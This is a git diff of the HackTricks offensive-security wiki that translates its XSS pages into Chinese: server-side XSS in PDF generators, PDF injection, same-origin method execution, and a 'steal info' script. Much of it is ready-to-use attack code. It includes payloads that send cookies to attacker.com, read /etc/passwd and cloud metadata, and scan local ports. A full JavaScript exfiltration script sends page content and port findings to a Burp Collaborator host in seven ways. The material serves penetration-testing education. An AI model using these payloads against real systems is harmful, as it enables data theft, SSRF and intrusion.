+## 自动浏览器访问以测试有效载荷
 ```javascript
 //Taken from https://github.com/svennergr/writeups/blob/master/inti/0621/README.md
 const puppeteer = require("puppeteer")
 
 const realPasswordLength = 3000
 async function sleep(ms) {
-  return new Promise((resolve) => setTimeout(resolve, ms))
+return new Promise((resolve) => setTimeout(resolve, ms))
 }
 
 ;(async () => {
-  const browser = await puppeteer.launch()
-  const page = await browser.newPage()
-  //Loop to iterate through different values
-  for (let i = 0; i < 10000; i += 100) {
-    console.log(`Run number ${i}`)
-    const input = `${"0".repeat(i)}${realPasswordLength}`
-    console.log(
-      `  https://challenge-0621.intigriti.io/passgen.php?passwordLength=${input}&allowNumbers=true&allowSymbols=true&timestamp=1624556811000`
-    )
-    //Go to the page
-    await page.goto(
-      `https://challenge-0621.intigriti.io/passgen.php?passwordLength=${input}&allowNumbers=true&allowSymbols=true&timestamp=1624556811000`
-    )
-    //Call function "generate()" inside the page
-    await page.evaluate("generate()")
-    //Get node inner text from an HTML element
-    const passwordContent = await page.$$eval(
-      ".alert .page-content",
-      (node) => node[0].innerText
-    )
-    //Transform the content and print it in console
-    const plainPassword = passwordContent.replace("Your password is: ", "")
-    if (plainPassword.length != realPasswordLength) {
-      console.log(i, plainPassword.length, plainPassword)
-    }
+const browser = await puppeteer.launch()
+const page = await browser.newPage()
+//Loop to iterate through different values
+for (let i = 0; i < 10000; i += 100) {
+console.log(`Run number ${i}`)
+const input = `${"0".repeat(i)}${realPasswordLength}`
+console.log(
+`  https://challenge-0621.intigriti.io/passgen.php?passwordLength=${input}&allowNumbers=true&allowSymbols=true&timestamp=1624556811000`
+)
+//Go to the page
+await page.goto(
+`https://challenge-0621.intigriti.io/passgen.php?passwordLength=${input}&allowNumbers=true&allowSymbols=true&timestamp=1624556811000`
+)
+//Call function "generate()" inside the page
+await page.evaluate("generate()")
+//Get node inner text from an HTML element
+const passwordContent = await page.$$eval(
+".alert .page-content",
+(node) => node[0].innerText
+)
+//Transform the content and print it in console
+const plainPassword = passwordContent.replace("Your password is: ", "")
+if (plainPassword.length != realPasswordLength) {
+console.log(i, plainPassword.length, plainPassword)
+}
 
-    await sleep(1000)
-  }
-  await browser.close()
+await sleep(1000)
+}
+await browser.close()
 })()
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md b/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md
index 152a1c202..455763911 100644
--- a/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md
+++ b/src/pentesting-web/xss-cross-site-scripting/pdf-injection.md
@@ -1,8 +1,7 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-**If your input is being reflected inside a PDF file, you can try to inject PDF data to execute JavaScript or steal the PDF content.**
+**如果您的输入在 PDF 文件中被反射，您可以尝试注入 PDF 数据以执行 JavaScript 或窃取 PDF 内容。**
 
-Chec the post: [**https://portswigger.net/research/portable-data-exfiltration**](https://portswigger.net/research/portable-data-exfiltration)
+查看帖子: [**https://portswigger.net/research/portable-data-exfiltration**](https://portswigger.net/research/portable-data-exfiltration)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md b/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
index 535d92ca4..fe0fec763 100644
--- a/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
+++ b/src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
@@ -1,27 +1,26 @@
-# Server Side XSS (Dynamic PDF)
+# 服务器端 XSS（动态 PDF）
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Server Side XSS (Dynamic PDF)
+## 服务器端 XSS（动态 PDF）
 
-If a web page is creating a PDF using user controlled input, you can try to **trick the bot** that is creating the PDF into **executing arbitrary JS code**.\
-So, if the **PDF creator bot finds** some kind of **HTML** **tags**, it is going to **interpret** them, and you can **abuse** this behaviour to cause a **Server XSS**.
+如果一个网页使用用户控制的输入创建 PDF，你可以尝试**欺骗创建 PDF 的机器人**使其**执行任意 JS 代码**。\
+因此，如果**PDF 创建机器人发现**某种**HTML** **标签**，它将会**解释**这些标签，你可以**利用**这种行为导致**服务器 XSS**。
 
-Please, notice that the `<script></script>` tags don't work always, so you will need a different method to execute JS (for example, abusing `<img` ).\
-Also, note that in a regular exploitation you will be **able to see/download the created pdf**, so you will be able to see everything you **write via JS** (using `document.write()` for example). But, if you **cannot see** the created PDF, you will probably need **extract the information making web request to you** (Blind).
+请注意，`<script></script>` 标签并不总是有效，因此你需要使用不同的方法来执行 JS（例如，利用 `<img`）。\
+另外，请注意，在常规利用中，你将**能够查看/下载创建的 PDF**，因此你将能够看到你**通过 JS 写入的所有内容**（例如使用 `document.write()`）。但是，如果你**无法查看**创建的 PDF，你可能需要**提取信息并向你发起网络请求**（盲注）。
 
-### Popular PDF generation
+### 常见 PDF 生成
 
-- **wkhtmltopdf** is known for its ability to convert HTML and CSS into PDF documents, utilizing the WebKit rendering engine. This tool is available as an open-source command line utility, making it accessible for a wide range of applications.
-- **TCPDF** offers a robust solution within the PHP ecosystem for PDF generation. It is capable of handling images, graphics, and encryption, showcasing its versatility for creating complex documents.
-- For those working in a Node.js environment, **PDFKit** presents a viable option. It enables the generation of PDF documents directly from HTML and CSS, providing a bridge between web content and printable formats.
-- Java developers might prefer **iText**, a library that not only facilitates PDF creation but also supports advanced features like digital signatures and form filling. Its comprehensive feature set makes it suitable for generating secure and interactive documents.
-- **FPDF** is another PHP library, distinguished by its simplicity and ease of use. It's designed for developers looking for a straightforward approach to PDF generation, without the need for extensive features.
+- **wkhtmltopdf** 以其将 HTML 和 CSS 转换为 PDF 文档的能力而闻名，利用 WebKit 渲染引擎。该工具作为开源命令行实用程序可用，使其适用于广泛的应用。
+- **TCPDF** 在 PHP 生态系统中提供了一个强大的 PDF 生成解决方案。它能够处理图像、图形和加密，展示了其创建复杂文档的多功能性。
+- 对于在 Node.js 环境中工作的开发者，**PDFKit** 提供了一个可行的选择。它允许直接从 HTML 和 CSS 生成 PDF 文档，为网页内容和可打印格式之间提供了桥梁。
+- Java 开发者可能更喜欢 **iText**，这是一个不仅促进 PDF 创建的库，还支持数字签名和表单填写等高级功能。其全面的功能集使其适合生成安全和互动的文档。
+- **FPDF** 是另一个 PHP 库，以其简单性和易用性而著称。它旨在为寻求简单 PDF 生成方法的开发者设计，无需复杂的功能。
 
 ## Payloads
 
-### Discovery
-
+### 发现
 ```markup
 <!-- Basic discovery, Write somthing-->
 <img src="x" onerror="document.write('test')" />
@@ -34,63 +33,55 @@ Also, note that in a regular exploitation you will be **able to see/download the
 <script>new Image().src="http://attacker.com/?c="+encodeURI(document.cookie);</script>
 <link rel=attachment href="http://attacker.com">
 ```
-
 ### SVG
 
-Any of the previous of following payloads may be used inside this SVG payload. One iframe accessing Burpcollab subdomain and another one accessing the metadata endpoint are put as examples.
-
+任何之前或以下的有效负载都可以在此 SVG 有效负载中使用。一个 iframe 访问 Burpcollab 子域，另一个访问元数据端点作为示例。
 ```markup
 <svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
-    <g>
-        <foreignObject width="800" height="500">
-            <body xmlns="http://www.w3.org/1999/xhtml">
-                <iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe>
-                <iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
-            </body>
-        </foreignObject>
-    </g>
+<g>
+<foreignObject width="800" height="500">
+<body xmlns="http://www.w3.org/1999/xhtml">
+<iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe>
+<iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
+</body>
+</foreignObject>
+</g>
 </svg>
 
 
 <svg width="100%" height="100%" viewBox="0 0 100 100"
-     xmlns="http://www.w3.org/2000/svg">
-  <circle cx="50" cy="50" r="45" fill="green"
-          id="foo"/>
-  <script type="text/javascript">
-    // <![CDATA[
-      alert(1);
-   // ]]>
-  </script>
+xmlns="http://www.w3.org/2000/svg">
+<circle cx="50" cy="50" r="45" fill="green"
+id="foo"/>
+<script type="text/javascript">
+// <![CDATA[
+alert(1);
+// ]]>
+</script>
 </svg>
 ```
+您可以在 [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet) 找到很多 **其他 SVG 载荷**。
 
-You can find a lot **other SVG payloads** in [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
-
-### Path disclosure
-
+### 路径泄露
 ```markup
 <!-- If the bot is accessing a file:// path, you will discover the internal path
 if not, you will at least have wich path the bot is accessing -->
 <img src="x" onerror="document.write(window.location)" />
 <script> document.write(window.location) </script>
 ```
+### 加载外部脚本
 
-### Load an external script
-
-The best conformable way to exploit this vulnerability is to abuse the vulnerability to make the bot load a script you control locally. Then, you will be able to change the payload locally and make the bot load it with the same code every time.
-
+利用此漏洞的最佳方法是利用该漏洞使机器人加载您本地控制的脚本。然后，您将能够在本地更改有效负载，并使机器人每次都加载相同的代码。
 ```markup
 <script src="http://attacker.com/myscripts.js"></script>
 <img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>
 ```
-
-### Read local file / SSRF
+### 读取本地文件 / SSRF
 
 > [!WARNING]
-> Change `file:///etc/passwd` for `http://169.254.169.254/latest/user-data` for example to **try to access an external web page (SSRF)**.
+> 将 `file:///etc/passwd` 更改为 `http://169.254.169.254/latest/user-data` 例如 **尝试访问外部网页 (SSRF)**。
 >
-> If SSRF is allowed, but you **cannot reach** an interesting domain or IP, [check this page for potential bypasses](../ssrf-server-side-request-forgery/url-format-bypass.md).
-
+> 如果允许 SSRF，但您 **无法访问** 有趣的域或 IP，[请查看此页面以获取潜在的绕过方法](../ssrf-server-side-request-forgery/url-format-bypass.md)。
 ```markup
 <script>
 x=new XMLHttpRequest;
@@ -101,11 +92,11 @@ x.open("GET","file:///etc/passwd");x.send();
 
 ```markup
 <script>
-    xhzeem = new XMLHttpRequest();
-    xhzeem.onload = function(){document.write(this.responseText);}
-    xhzeem.onerror = function(){document.write('failed!')}
-    xhzeem.open("GET","file:///etc/passwd");
-    xhzeem.send();
+xhzeem = new XMLHttpRequest();
+xhzeem.onload = function(){document.write(this.responseText);}
+xhzeem.onerror = function(){document.write('failed!')}
+xhzeem.open("GET","file:///etc/passwd");
+xhzeem.send();
 </script>
 ```
 
@@ -124,62 +115,55 @@ x.open("GET","file:///etc/passwd");x.send();
 ```markup
 <annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />
 ```
-
-### Bot delay
-
+### 机器人延迟
 ```markup
 <!--Make the bot send a ping every 500ms to check how long does the bot wait-->
 <script>
-    let time = 500;
-    setInterval(()=>{
-        let img = document.createElement("img");
-        img.src = `https://attacker.com/ping?time=${time}ms`;
-        time += 500;
-    }, 500);
+let time = 500;
+setInterval(()=>{
+let img = document.createElement("img");
+img.src = `https://attacker.com/ping?time=${time}ms`;
+time += 500;
+}, 500);
 </script>
 <img src="https://attacker.com/delay">
 ```
-
-### Port Scan
-
+### 端口扫描
 ```markup
 <!--Scan local port and receive a ping indicating which ones are found-->
 <script>
 const checkPort = (port) => {
-    fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {
-        let img = document.createElement("img");
-        img.src = `http://attacker.com/ping?port=${port}`;
-    });
+fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {
+let img = document.createElement("img");
+img.src = `http://attacker.com/ping?port=${port}`;
+});
 }
 
 for(let i=0; i<1000; i++) {
-    checkPort(i);
+checkPort(i);
 }
 </script>
 <img src="https://attacker.com/startingScan">
 ```
-
 ### [SSRF](../ssrf-server-side-request-forgery/)
 
-This vulnerability can be transformed very easily in a SSRF (as you can make the script load external resources). So just try to exploit it (read some metadata?).
+这个漏洞可以很容易地转化为 SSRF（因为你可以让脚本加载外部资源）。所以只需尝试利用它（读取一些元数据？）。
 
-### Attachments: PD4ML
-
-There are some HTML 2 PDF engines that allow to **specify attachments for the PDF**, like **PD4ML**. You can abuse this feature to **attach any local file** to the PDF.\
-To open the attachment I opened the file with **Firefox and double clicked the Paperclip symbol** to **store the attachment** as a new file.\
-Capturing the **PDF response** with burp should also **show the attachment in cleat text** inside the PDF.
+### 附件：PD4ML
 
+有一些 HTML 2 PDF 引擎允许 **为 PDF 指定附件**，例如 **PD4ML**。你可以利用这个功能 **将任何本地文件附加到 PDF**。\
+为了打开附件，我使用 **Firefox 打开文件并双击回形针符号**以 **将附件存储为新文件**。\
+使用 burp 捕获 **PDF 响应**也应该 **在 PDF 中以明文显示附件**。
 ```html
 <!-- From https://0xdf.gitlab.io/2021/04/24/htb-bucket.html -->
 <html>
-  <pd4ml:attachment
-    src="/etc/passwd"
-    description="attachment sample"
-    icon="Paperclip" />
+<pd4ml:attachment
+src="/etc/passwd"
+description="attachment sample"
+icon="Paperclip" />
 </html>
 ```
-
-## References
+## 参考文献
 
 - [https://lbherrera.github.io/lab/h1415-ctf-writeup.html](https://lbherrera.github.io/lab/h1415-ctf-writeup.html)
 - [https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/](https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/)
@@ -187,4 +171,3 @@ Capturing the **PDF response** with burp should also **show the attachment in cl
 - [https://infosecwriteups.com/breaking-down-ssrf-on-pdf-generation-a-pentesting-guide-66f8a309bf3c](https://infosecwriteups.com/breaking-down-ssrf-on-pdf-generation-a-pentesting-guide-66f8a309bf3c)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xss-cross-site-scripting/shadow-dom.md b/src/pentesting-web/xss-cross-site-scripting/shadow-dom.md
index c665cb6a6..113e8041b 100644
--- a/src/pentesting-web/xss-cross-site-scripting/shadow-dom.md
+++ b/src/pentesting-web/xss-cross-site-scripting/shadow-dom.md
@@ -2,7 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**Check out this blog: [https://blog.ankursundara.com/shadow-dom/](https://blog.ankursundara.com/shadow-dom/)** and this **CTF challenge: [https://github.com/Super-Guesser/ctf/blob/master/2022/dicectf/shadow.md](https://github.com/Super-Guesser/ctf/blob/master/2022/dicectf/shadow.md)**
+**查看这个博客: [https://blog.ankursundara.com/shadow-dom/](https://blog.ankursundara.com/shadow-dom/)** 和这个 **CTF 挑战: [https://github.com/Super-Guesser/ctf/blob/master/2022/dicectf/shadow.md](https://github.com/Super-Guesser/ctf/blob/master/2022/dicectf/shadow.md)**
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xss-cross-site-scripting/sniff-leak.md b/src/pentesting-web/xss-cross-site-scripting/sniff-leak.md
index bcb1b3b25..3a2a40e08 100644
--- a/src/pentesting-web/xss-cross-site-scripting/sniff-leak.md
+++ b/src/pentesting-web/xss-cross-site-scripting/sniff-leak.md
@@ -2,13 +2,12 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Leak script content by converting it to UTF16
+## 通过将其转换为UTF16泄露脚本内容
 
-[**This writeup**](https://blog.huli.tw/2022/08/01/en/uiuctf-2022-writeup/#modernism21-solves) leaks a text/plain because there is no `X-Content-Type-Options: nosniff` header by adding some initial characters that will make javascript think that the content is in UTF-16 so th script doesn't breaks.
+[**此文档**](https://blog.huli.tw/2022/08/01/en/uiuctf-2022-writeup/#modernism21-solves) 泄露了一个text/plain，因为没有 `X-Content-Type-Options: nosniff` 头，通过添加一些初始字符使得javascript认为内容是UTF-16，因此脚本不会中断。
 
-## Leak script content by treating it as an ICO
+## 通过将其视为ICO泄露脚本内容
 
-[**The next writeup**](https://blog.huli.tw/2022/08/01/en/uiuctf-2022-writeup/#precisionism3-solves) leaks the script content by loading it as if it was an ICO image accessing the `width` parameter.
+[**下一个文档**](https://blog.huli.tw/2022/08/01/en/uiuctf-2022-writeup/#precisionism3-solves) 通过将脚本内容加载为ICO图像来泄露脚本内容，访问 `width` 参数。
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md b/src/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md
index f53513fb5..d90071487 100644
--- a/src/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md
+++ b/src/pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md
@@ -4,40 +4,39 @@
 
 ## Same Origin Method Execution
 
-There will be occasions where you can execute some limited javascript in a page. For example, in the case where you can[ **control a callback value that will be executed**](./#javascript-function).
+在某些情况下，您可以在页面中执行一些有限的javascript。例如，在您可以[ **控制将被执行的回调值**](./#javascript-function)的情况下。
 
-In those case, one of the best things that you could do is to **access the DOM to call whatever** sensitive action you can find in there (like clicking a button). However, usually you will find this vulnerability in **small endpoints without any interesting thing in the DOM**.
+在这些情况下，您可以做的最好的事情之一是**访问DOM以调用您可以找到的任何**敏感操作（例如点击按钮）。然而，通常您会在**没有任何有趣内容的DOM的小端点**中发现此漏洞。
 
-In those scenarios, this attack will be very useful, because its goal is to be able to **abuse the limited JS execution inside a DOM from a different page from the same domain** with much interesting actions.
+在这些场景中，这种攻击将非常有用，因为其目标是能够**滥用来自同一域的不同页面中的DOM内的有限JS执行**，以进行更有趣的操作。
 
-Basically, the attack flow is the following:
+基本上，攻击流程如下：
 
-- Find a **callback that you can abuse** (potentially limited to \[\w\\.\_]).
-  - If it's not limited and you can execute any JS, you could just abuse this as a regular XSS
-- Make the **victim open a page** controlled by the **attacker**
-- The **page will open itself** in a **different window** (the new window will have the object **`opener`** referencing the initial one)
-- The **initial page** will load the **page** where the **interesting DOM** is located.
-- The **second page** will load the **vulnerable page abusing the callback** and using the **`opener`** object to **access and execute some action in the initial page** (which now contains the interesting DOM).
+- 找到一个**您可以滥用的回调**（可能限制为 \[\w\\.\_]）。
+- 如果没有限制并且您可以执行任何JS，您可以像常规XSS一样滥用它。
+- 让**受害者打开一个由** **攻击者**控制的页面。
+- **页面将自己**在一个**不同的窗口**中打开（新窗口将有对象**`opener`**引用初始窗口）。
+- **初始页面**将加载**有趣DOM**所在的**页面**。
+- **第二个页面**将加载**滥用回调的易受攻击页面**，并使用**`opener`**对象**访问并在初始页面中执行某些操作**（现在包含有趣的DOM）。
 
 > [!CAUTION]
-> Note that even if the initial page access to a new URL after having created the second page, the **`opener` object of the second page is still a valid reference to the first page in the new DOM**.
+> 请注意，即使初始页面在创建第二个页面后访问新URL，**第二个页面的`opener`对象仍然是对新DOM中第一个页面的有效引用**。
 >
-> Moreover, in order for the second page to be able to use the opener object **both pages must be in the same origin**. This is the reason why, in order to abuse this vulnerability, you need to find some sort of **XSS in the same origin**.
+> 此外，为了使第二个页面能够使用opener对象，**两个页面必须在同一来源**。这就是为什么为了滥用此漏洞，您需要找到某种**同一来源中的XSS**。
 
 ### Exploitation
 
-- You can use this form to **generate a PoC** to exploit this type of vulnerability: [https://www.someattack.com/Playground/SOMEGenerator](https://www.someattack.com/Playground/SOMEGenerator)
-- In order to find a DOM path to a HTML element with a click you can use this browser extension: [https://www.someattack.com/Playground/targeting_tool](https://www.someattack.com/Playground/targeting_tool)
+- 您可以使用此表单来**生成PoC**以利用此类漏洞：[https://www.someattack.com/Playground/SOMEGenerator](https://www.someattack.com/Playground/SOMEGenerator)
+- 为了找到具有点击的HTML元素的DOM路径，您可以使用此浏览器扩展：[https://www.someattack.com/Playground/targeting_tool](https://www.someattack.com/Playground/targeting_tool)
 
 ### Example
 
-- You can find a vulnerable example in [https://www.someattack.com/Playground/](https://www.someattack.com/Playground/)
-  - Note that in this example the server is **generating javascript code** and **adding** it to the HTML based on the **content of the callback parameter:** `<script>opener.{callbacl_content}</script>` . Thats why in this example you don't need to indicate the use of `opener` explicitly.
-- Also check this CTF writeup: [https://ctftime.org/writeup/36068](https://ctftime.org/writeup/36068)
+- 您可以在[https://www.someattack.com/Playground/](https://www.someattack.com/Playground/)找到一个易受攻击的示例。
+- 请注意，在此示例中，服务器**生成javascript代码**并**将其添加**到基于**回调参数内容的HTML中：**`<script>opener.{callbacl_content}</script>`**。这就是为什么在此示例中您不需要明确指示使用`opener`。
+- 还可以查看此CTF写作：[https://ctftime.org/writeup/36068](https://ctftime.org/writeup/36068)
 
 ## References
 
 - [https://conference.hitb.org/hitbsecconf2017ams/sessions/everybody-wants-some-advance-same-origin-method-execution/](https://conference.hitb.org/hitbsecconf2017ams/sessions/everybody-wants-some-advance-same-origin-method-execution/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xss-cross-site-scripting/steal-info-js.md b/src/pentesting-web/xss-cross-site-scripting/steal-info-js.md
index 93e3808b7..e00d97814 100644
--- a/src/pentesting-web/xss-cross-site-scripting/steal-info-js.md
+++ b/src/pentesting-web/xss-cross-site-scripting/steal-info-js.md
@@ -3,12 +3,11 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 {% embed url="https://websec.nl/" %}
-
 ```javascript
 // SELECT HERE THE EXFILTRATION MODE (more than 1 can be selected)
 // If any GET method is selected (like location or RQ_GET), it's recommended to exfiltrate each info 1 by 1
 var ATTACKER_SERVER =
-  "https://weecosb5a2k7jc0cwlyksg9qzh57tw.burpcollaborator.net"
+"https://weecosb5a2k7jc0cwlyksg9qzh57tw.burpcollaborator.net"
 var EXFIL_BY_IMG = false
 var EXFIL_BY_RQ_GET = false
 var EXFIL_BY_RQ_POST = true
@@ -21,101 +20,101 @@ var ALL_INFO = "" // Only used by Location exfiltration
 
 // Function to make the data possible to transmit via either GET or POST
 function encode(text) {
-  return encodeURI(btoa(text))
+return encodeURI(btoa(text))
 }
 
 // Functions to exfiltrate the information
 function exfil_info(info_name, text, is_final = false) {
-  if (EXFIL_BY_IMG) exfil_by_img(info_name, text)
-  if (EXFIL_BY_RQ_GET) exfil_by_rq_get(info_name, text)
-  if (EXFIL_BY_RQ_POST) exfil_by_rq_post(info_name, text)
-  if (EXFIL_BY_FETCH_GET) exfil_by_fetch_get(info_name, text)
-  if (EXFIL_BY_FETCH_POST) exfil_by_fetch_post(info_name, text)
-  if (EXFIL_BY_NAV) exfil_by_nav(info_name, text)
-  if (EXFIL_BY_LOC) {
-    if (is_final) exfil_by_loc(info_name, text)
-    else ALL_INFO += "\n\n" + info_name + "=" + text
-  }
+if (EXFIL_BY_IMG) exfil_by_img(info_name, text)
+if (EXFIL_BY_RQ_GET) exfil_by_rq_get(info_name, text)
+if (EXFIL_BY_RQ_POST) exfil_by_rq_post(info_name, text)
+if (EXFIL_BY_FETCH_GET) exfil_by_fetch_get(info_name, text)
+if (EXFIL_BY_FETCH_POST) exfil_by_fetch_post(info_name, text)
+if (EXFIL_BY_NAV) exfil_by_nav(info_name, text)
+if (EXFIL_BY_LOC) {
+if (is_final) exfil_by_loc(info_name, text)
+else ALL_INFO += "\n\n" + info_name + "=" + text
+}
 }
 
 function exfil_by_img(info_name, text) {
-  new Image().src =
-    ATTACKER_SERVER +
-    "/exfil_by_img/" +
-    info_name +
-    "?" +
-    info_name +
-    "=" +
-    text
+new Image().src =
+ATTACKER_SERVER +
+"/exfil_by_img/" +
+info_name +
+"?" +
+info_name +
+"=" +
+text
 }
 
 function exfil_by_rq_get(info_name, text) {
-  var xhttp = new XMLHttpRequest()
-  xhttp.open(
-    "GET",
-    ATTACKER_SERVER +
-      "/exfil_by_rq_get/" +
-      info_name +
-      "?" +
-      info_name +
-      "=" +
-      text,
-    true
-  )
-  xhttp.send()
+var xhttp = new XMLHttpRequest()
+xhttp.open(
+"GET",
+ATTACKER_SERVER +
+"/exfil_by_rq_get/" +
+info_name +
+"?" +
+info_name +
+"=" +
+text,
+true
+)
+xhttp.send()
 }
 
 function exfil_by_rq_post(info_name, text) {
-  var xhttp = new XMLHttpRequest()
-  xhttp.open("POST", ATTACKER_SERVER + "/exfil_by_rq_post/" + info_name, true)
-  xhttp.send(text)
+var xhttp = new XMLHttpRequest()
+xhttp.open("POST", ATTACKER_SERVER + "/exfil_by_rq_post/" + info_name, true)
+xhttp.send(text)
 }
 
 function exfil_by_fetch_get(info_name, text) {
-  fetch(
-    ATTACKER_SERVER +
-      "/exfil_by_fetch_get/" +
-      info_name +
-      "?" +
-      info_name +
-      "=" +
-      text,
-    { method: "GET", mode: "no-cors" }
-  )
+fetch(
+ATTACKER_SERVER +
+"/exfil_by_fetch_get/" +
+info_name +
+"?" +
+info_name +
+"=" +
+text,
+{ method: "GET", mode: "no-cors" }
+)
 }
 
 function exfil_by_fetch_post(info_name, text) {
-  fetch(ATTACKER_SERVER + "/exfil_by_fetch_post/" + info_name, {
-    method: "POST",
-    mode: "no-cors",
-    body: text,
-  })
+fetch(ATTACKER_SERVER + "/exfil_by_fetch_post/" + info_name, {
+method: "POST",
+mode: "no-cors",
+body: text,
+})
 }
 
 function exfil_by_nav(info_name, text) {
-  navigator.sendBeacon(ATTACKER_SERVER + "/exfil_by_nav/" + info_name, text)
+navigator.sendBeacon(ATTACKER_SERVER + "/exfil_by_nav/" + info_name, text)
 }
 
 function exfil_by_loc(info_name, text) {
-  document.location = ATTACKER_SERVER + "/exfil_by_loc/?a=" + encode(ALL_INFO)
+document.location = ATTACKER_SERVER + "/exfil_by_loc/?a=" + encode(ALL_INFO)
 }
 
 // Functions to get the data to exfiltrate
 function exfil_page_content(url) {
-  var xhr = new XMLHttpRequest()
-  xhr.onreadystatechange = function () {
-    if (xhr.readyState == XMLHttpRequest.DONE) {
-      exfil_info(url, encode(xhr.responseText))
-    }
-  }
-  xhr.open("GET", url, true)
-  xhr.send(null)
+var xhr = new XMLHttpRequest()
+xhr.onreadystatechange = function () {
+if (xhr.readyState == XMLHttpRequest.DONE) {
+exfil_info(url, encode(xhr.responseText))
+}
+}
+xhr.open("GET", url, true)
+xhr.send(null)
 }
 
 function exfil_internal_port(port) {
-  fetch("http://127.0.0.1:" + port + "/", { mode: "no-cors" }).then(() => {
-    exfil_info("internal_port", encode(port))
-  })
+fetch("http://127.0.0.1:" + port + "/", { mode: "no-cors" }).then(() => {
+exfil_info("internal_port", encode(port))
+})
 }
 
 // Info to exfiltrate
@@ -128,98 +127,96 @@ exfil_page_content("/flag")
 exfil_page_content("/flag.txt")
 
 top_1000 = [
-  1, 3, 4, 6, 7, 9, 13, 17, 19, 20, 21, 22, 23, 24, 25, 26, 30, 32, 33, 37, 42,
-  43, 49, 53, 70, 79, 80, 81, 82, 83, 84, 85, 88, 89, 90, 99, 100, 106, 109,
-  110, 111, 113, 119, 125, 135, 139, 143, 144, 146, 161, 163, 179, 199, 211,
-  212, 222, 254, 255, 256, 259, 264, 280, 301, 306, 311, 340, 366, 389, 406,
-  407, 416, 417, 425, 427, 443, 444, 445, 458, 464, 465, 481, 497, 500, 512,
-  513, 514, 515, 524, 541, 543, 544, 545, 548, 554, 555, 563, 587, 593, 616,
-  617, 625, 631, 636, 646, 648, 666, 667, 668, 683, 687, 691, 700, 705, 711,
-  714, 720, 722, 726, 749, 765, 777, 783, 787, 800, 801, 808, 843, 873, 880,
-  888, 898, 900, 901, 902, 903, 911, 912, 981, 987, 990, 992, 993, 995, 999,
-  1000, 1001, 1002, 1007, 1009, 1010, 1011, 1021, 1022, 1023, 1024, 1025, 1026,
-  1027, 1028, 1029, 1030, 1031, 1032, 1033, 1034, 1035, 1036, 1037, 1038, 1039,
-  1040, 1041, 1042, 1043, 1044, 1045, 1046, 1047, 1048, 1049, 1050, 1051, 1052,
-  1053, 1054, 1055, 1056, 1057, 1058, 1059, 1060, 1061, 1062, 1063, 1064, 1065,
-  1066, 1067, 1068, 1069, 1070, 1071, 1072, 1073, 1074, 1075, 1076, 1077, 1078,
-  1079, 1080, 1081, 1082, 1083, 1084, 1085, 1086, 1087, 1088, 1089, 1090, 1091,
-  1092, 1093, 1094, 1095, 1096, 1097, 1098, 1099, 1100, 1102, 1104, 1105, 1106,
-  1107, 1108, 1110, 1111, 1112, 1113, 1114, 1117, 1119, 1121, 1122, 1123, 1124,
-  1126, 1130, 1131, 1132, 1137, 1138, 1141, 1145, 1147, 1148, 1149, 1151, 1152,
-  1154, 1163, 1164, 1165, 1166, 1169, 1174, 1175, 1183, 1185, 1186, 1187, 1192,
-  1198, 1199, 1201, 1213, 1216, 1217, 1218, 1233, 1234, 1236, 1244, 1247, 1248,
-  1259, 1271, 1272, 1277, 1287, 1296, 1300, 1301, 1309, 1310, 1311, 1322, 1328,
-  1334, 1352, 1417, 1433, 1434, 1443, 1455, 1461, 1494, 1500, 1501, 1503, 1521,
-  1524, 1533, 1556, 1580, 1583, 1594, 1600, 1641, 1658, 1666, 1687, 1688, 1700,
-  1717, 1718, 1719, 1720, 1721, 1723, 1755, 1761, 1782, 1783, 1801, 1805, 1812,
-  1839, 1840, 1862, 1863, 1864, 1875, 1900, 1914, 1935, 1947, 1971, 1972, 1974,
-  1984, 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009,
-  2010, 2013, 2020, 2021, 2022, 2030, 2033, 2034, 2035, 2038, 2040, 2041, 2042,
-  2043, 2045, 2046, 2047, 2048, 2049, 2065, 2068, 2099, 2100, 2103, 2105, 2106,
-  2107, 2111, 2119, 2121, 2126, 2135, 2144, 2160, 2161, 2170, 2179, 2190, 2191,
-  2196, 2200, 2222, 2251, 2260, 2288, 2301, 2323, 2366, 2381, 2382, 2383, 2393,
-  2394, 2399, 2401, 2492, 2500, 2522, 2525, 2557, 2601, 2602, 2604, 2605, 2607,
